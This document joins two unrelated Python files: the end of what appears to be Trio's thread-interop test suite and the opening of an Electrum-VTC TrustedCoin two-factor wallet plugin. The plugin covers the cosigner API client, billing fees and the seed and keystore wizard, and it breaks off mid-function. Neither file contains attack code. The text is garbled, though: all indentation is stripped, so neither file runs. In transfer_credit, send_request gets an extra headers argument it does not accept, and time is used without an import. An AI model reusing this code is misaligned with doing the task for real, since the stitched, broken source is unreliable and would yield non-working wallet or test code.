child_thread = threading.Thread(target=threadfn, daemon=True)
child_thread.start()
while child_thread.is_alive():
print("yawn")
await sleep(0.01)
assert record == [("start", child_thread), ("f", trio_thread), expected]
token = _core.current_trio_token()
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
return 2
await check_case(from_thread_run_sync, f, ("got", 2), trio_token=token)
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
raise ValueError
await check_case(from_thread_run_sync, f, ("error", ValueError), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
return 3
await check_case(from_thread_run, f, ("got", 3), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
raise KeyError
await check_case(from_thread_run, f, ("error", KeyError), trio_token=token)
async def test_do_in_trio_thread_from_trio_thread():
with pytest.raises(RuntimeError):
from_thread_run_sync(lambda: None) # pragma: no branch
async def foo(): # pragma: no cover
pass
with pytest.raises(RuntimeError):
from_thread_run(foo)
def test_run_in_trio_thread_ki():
# if we get a control-C during a run_in_trio_thread, then it propagates
# back to the caller (slick!)
record = set()
async def check_run_in_trio_thread():
token = _core.current_trio_token()
def trio_thread_fn():
print("in Trio thread")
assert not _core.currently_ki_protected()
print("ki_self")
try:
ki_self()
finally:
import sys
print("finally", sys.exc_info())
async def trio_thread_afn():
trio_thread_fn()
def external_thread_fn():
try:
print("running")
from_thread_run_sync(trio_thread_fn, trio_token=token)
except KeyboardInterrupt:
print("ok1")
record.add("ok1")
try:
from_thread_run(trio_thread_afn, trio_token=token)
except KeyboardInterrupt:
print("ok2")
record.add("ok2")
thread = threading.Thread(target=external_thread_fn)
thread.start()
print("waiting")
while thread.is_alive():
await sleep(0.01)
print("waited, joining")
thread.join()
print("done")
_core.run(check_run_in_trio_thread)
assert record == {"ok1", "ok2"}
def test_await_in_trio_thread_while_main_exits():
record = []
ev = Event()
async def trio_fn():
record.append("sleeping")
ev.set()
await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def thread_fn(token):
try:
from_thread_run(trio_fn, trio_token=token)
except _core.Cancelled:
record.append("cancelled")
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=thread_fn, args=(token,))
thread.start()
await ev.wait()
assert record == ["sleeping"]
return thread
thread = _core.run(main)
thread.join()
assert record == ["sleeping", "cancelled"]
async def test_run_in_worker_thread():
trio_thread = threading.current_thread()
def f(x):
return (x, threading.current_thread())
x, child_thread = await to_thread_run_sync(f, 1)
assert x == 1
assert child_thread != trio_thread
def g():
raise ValueError(threading.current_thread())
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(g)
print(excinfo.value.args)
assert excinfo.value.args[0] != trio_thread
async def test_run_in_worker_thread_cancellation():
register = [None]
def f(q):
# Make the thread block for a controlled amount of time
register[0] = "blocking"
q.get()
register[0] = "finished"
async def child(q, cancellable):
record.append("start")
try:
return await to_thread_run_sync(f, q, cancellable=cancellable)
finally:
record.append("exit")
record = []
q = stdlib_queue.Queue()
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, True)
# Give it a chance to get started. (This is important because
# to_thread_run_sync does a checkpoint_if_cancelled before
# blocking on the thread, and we don't want to trigger this.)
await wait_all_tasks_blocked()
assert record == ["start"]
# Then cancel it.
nursery.cancel_scope.cancel()
# The task exited, but the thread didn't:
assert register[0] != "finished"
# Put the thread out of its misery:
q.put(None)
while register[0] != "finished":
time.sleep(0.01)
# This one can't be cancelled
record = []
register[0] = None
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, False)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
for _ in range(10):
await _core.checkpoint()
# It's still running
assert record == ["start"]
q.put(None)
# Now it exits
# But if we cancel *before* it enters, the entry is itself a cancellation
# point
with _core.CancelScope() as scope:
scope.cancel()
await child(q, False)
assert scope.cancelled_caught
# Make sure that if trio.run exits, and then the thread finishes, then that's
# handled gracefully. (Requires that the thread result machinery be prepared
# for call_soon to raise RunFinishedError.)
def test_run_in_worker_thread_abandoned(capfd, monkeypatch):
monkeypatch.setattr(_core._thread_cache, "IDLE_TIMEOUT", 0.01)
q1 = stdlib_queue.Queue()
q2 = stdlib_queue.Queue()
def thread_fn():
q1.get()
q2.put(threading.current_thread())
async def main():
async def child():
await to_thread_run_sync(thread_fn, cancellable=True)
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
_core.run(main)
q1.put(None)
# This makes sure:
# - the thread actually ran
# - that thread has finished before we check for its output
thread = q2.get()
while thread.is_alive():
time.sleep(0.01) # pragma: no cover
# Make sure we don't have a "Exception in thread ..." dump to the console:
out, err = capfd.readouterr()
assert "Exception in thread" not in out
assert "Exception in thread" not in err
@pytest.mark.parametrize("MAX", [3, 5, 10])
@pytest.mark.parametrize("cancel", [False, True])
@pytest.mark.parametrize("use_default_limiter", [False, True])
async def test_run_in_worker_thread_limiter(MAX, cancel, use_default_limiter):
# This test is a bit tricky. The goal is to make sure that if we set
# limiter=CapacityLimiter(MAX), then in fact only MAX threads are ever
# running at a time, even if there are more concurrent calls to
# to_thread_run_sync, and even if some of those are cancelled. And
# also to make sure that the default limiter actually limits.
COUNT = 2 * MAX
gate = threading.Event()
lock = threading.Lock()
if use_default_limiter:
c = current_default_thread_limiter()
orig_total_tokens = c.total_tokens
c.total_tokens = MAX
limiter_arg = None
else:
c = CapacityLimiter(MAX)
orig_total_tokens = MAX
limiter_arg = c
try:
# We used to use regular variables and 'nonlocal' here, but it turns
# out that it's not safe to assign to closed-over variables that are
# visible in multiple threads, at least as of CPython 3.6 and PyPy
# 5.8:
#
# https://bugs.python.org/issue30744
# https://bitbucket.org/pypy/pypy/issues/2591/
#
# Mutating them in-place is OK though (as long as you use proper
# locking etc.).
class state:
pass
state.ran = 0
state.high_water = 0
state.running = 0
state.parked = 0
token = _core.current_trio_token()
def thread_fn(cancel_scope):
print("thread_fn start")
from_thread_run_sync(cancel_scope.cancel, trio_token=token)
with lock:
state.ran += 1
state.running += 1
state.high_water = max(state.high_water, state.running)
# The Trio thread below watches this value and uses it as a
# signal that all the stats calculations have finished.
state.parked += 1
gate.wait()
with lock:
state.parked -= 1
state.running -= 1
print("thread_fn exiting")
async def run_thread(event):
with _core.CancelScope() as cancel_scope:
await to_thread_run_sync(
thread_fn, cancel_scope, limiter=limiter_arg, cancellable=cancel
)
print("run_thread finished, cancelled:", cancel_scope.cancelled_caught)
event.set()
async with _core.open_nursery() as nursery:
print("spawning")
events = []
for i in range(COUNT):
events.append(Event())
nursery.start_soon(run_thread, events[-1])
await wait_all_tasks_blocked()
# In the cancel case, we in particular want to make sure that the
# cancelled tasks don't release the semaphore. So let's wait until
# at least one of them has exited, and that everything has had a
# chance to settle down from this, before we check that everyone
# who's supposed to be waiting is waiting:
if cancel:
print("waiting for first cancellation to clear")
await events[0].wait()
await wait_all_tasks_blocked()
# Then wait until the first MAX threads are parked in gate.wait(),
# and the next MAX threads are parked on the semaphore, to make
# sure no-one is sneaking past, and to make sure the high_water
# check below won't fail due to scheduling issues. (It could still
# fail if too many threads are let through here.)
while state.parked != MAX or c.statistics().tasks_waiting != MAX:
await sleep(0.01) # pragma: no cover
# Then release the threads
gate.set()
assert state.high_water == MAX
if cancel:
# Some threads might still be running; need to wait to them to
# finish before checking that all threads ran. We can do this
# using the CapacityLimiter.
while c.borrowed_tokens > 0:
await sleep(0.01) # pragma: no cover
assert state.ran == COUNT
assert state.running == 0
finally:
c.total_tokens = orig_total_tokens
async def test_run_in_worker_thread_custom_limiter():
# Basically just checking that we only call acquire_on_behalf_of and
# release_on_behalf_of, since that's part of our documented API.
record = []
class CustomLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
self._borrower = borrower
def release_on_behalf_of(self, borrower):
record.append("release")
assert borrower == self._borrower
await to_thread_run_sync(lambda: None, limiter=CustomLimiter())
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_limiter_error():
record = []
class BadCapacityLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
def release_on_behalf_of(self, borrower):
record.append("release")
raise ValueError
bs = BadCapacityLimiter()
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: None, limiter=bs)
assert excinfo.value.__context__ is None
assert record == ["acquire", "release"]
record = []
# If the original function raised an error, then the semaphore error
# chains with it
d = {}
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: d["x"], limiter=bs)
assert isinstance(excinfo.value.__context__, KeyError)
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_fail_to_spawn(monkeypatch):
# Test the unlikely but possible case where trying to spawn a thread fails
def bad_start(self, *args):
raise RuntimeError("the engines canna take it captain")
monkeypatch.setattr(_core._thread_cache.ThreadCache, "start_thread_soon", bad_start)
limiter = current_default_thread_limiter()
assert limiter.borrowed_tokens == 0
# We get an appropriate error, and the limiter is cleanly released
with pytest.raises(RuntimeError) as excinfo:
await to_thread_run_sync(lambda: None) # pragma: no cover
assert "engines" in str(excinfo.value)
assert limiter.borrowed_tokens == 0
async def test_trio_to_thread_run_sync_token():
# Test that to_thread_run_sync automatically injects the current trio token
# into a spawned thread
def thread_fn():
callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_to_thread_run_sync_expected_error():
# Test correct error when passed async function
async def async_fn(): # pragma: no cover
pass
with pytest.raises(TypeError, match="expected a sync function"):
await to_thread_run_sync(async_fn)
async def test_trio_from_thread_run_sync():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run_sync()
def thread_fn():
trio_time = from_thread_run_sync(_core.current_time)
return trio_time
trio_time = await to_thread_run_sync(thread_fn)
assert isinstance(trio_time, float)
# Test correct error when passed async function
async def async_fn(): # pragma: no cover
pass
def thread_fn():
from_thread_run_sync(async_fn)
with pytest.raises(TypeError, match="expected a sync function"):
await to_thread_run_sync(thread_fn)
async def test_trio_from_thread_run():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run()
record = []
async def back_in_trio_fn():
_core.current_time() # implicitly checks that we're in trio
record.append("back in trio")
def thread_fn():
record.append("in thread")
from_thread_run(back_in_trio_fn)
await to_thread_run_sync(thread_fn)
assert record == ["in thread", "back in trio"]
# Test correct error when passed sync function
def sync_fn(): # pragma: no cover
pass
with pytest.raises(TypeError, match="appears to be synchronous"):
await to_thread_run_sync(from_thread_run, sync_fn)
async def test_trio_from_thread_token():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync()
# share the same Trio token
def thread_fn():
callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_from_thread_token_kwarg():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync() can
# use an explicitly defined token
def thread_fn(token):
callee_token = from_thread_run_sync(_core.current_trio_token, trio_token=token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn, caller_token)
assert callee_token == caller_token
async def test_from_thread_no_token():
# Test that a "raw call" to trio.from_thread.run() fails because no token
# has been provided
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time)
def test_run_fn_as_system_task_catched_badly_typed_token():
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time, trio_token="Not TrioTokentype")
async def test_from_thread_inside_trio_thread():
def not_called(): # pragma: no cover
assert False
trio_token = _core.current_trio_token()
with pytest.raises(RuntimeError):
from_thread_run_sync(not_called, trio_token=trio_token)
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import requests
import json
import base64
from urllib.parse import urljoin
from urllib.parse import quote
import electrum_vtc
from electrum_vtc import bitcoin, ecc
from electrum_vtc import constants
from electrum_vtc import keystore
from electrum_vtc.bitcoin import *
from electrum_vtc.mnemonic import Mnemonic
from electrum_vtc import version
from electrum_vtc.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_vtc.i18n import _
from electrum_vtc.plugins import BasePlugin, hook
from electrum_vtc.util import NotEnoughFunds
from electrum_vtc.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
def send_request(self, method, relative_url, data=None):
kwargs = {'headers': {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
try:
response = requests.request(method, url, **kwargs)
except Exception as e:
raise ErrorConnectingServer(e)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = self.storage.get('trustedcoin_billing_addresses', {})
self._billing_addresses = {} # index -> addr
# convert keys from str to int
for index, addr in list(billing_addresses.items()):
self._billing_addresses[int(index)] = addr
self._billing_addresses_set = set(self._billing_addresses.values()) # set of addrs
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.print_error("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_to_network()
r = server.sign(short_id, raw_tx, otp)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str):
saved_addr = self._billing_addresses.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(self._billing_addresses) if self._billing_addresses else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i)
self._billing_addresses[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
self._billing_addresses[billing_index] = address
self._billing_addresses_set.add(address)
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses)
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.print_error("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and wallet.is_billing_address(addr):
return addr, amount
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_index = billing_info['billing_index']
billing_address = make_billing_address(wallet, billing_index)
if billing_address != billing_info['billing_address']:
raise Exception('unexpected trustedcoin billing address: expected {}, received {}'
.format(billing_address, billing_info['billing_address']))
wallet.add_new_billing_address(billing_index, billing_address)
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum_vtc.mnemonic import Mnemonic
from electrum_vtc.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, email, wizard):
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
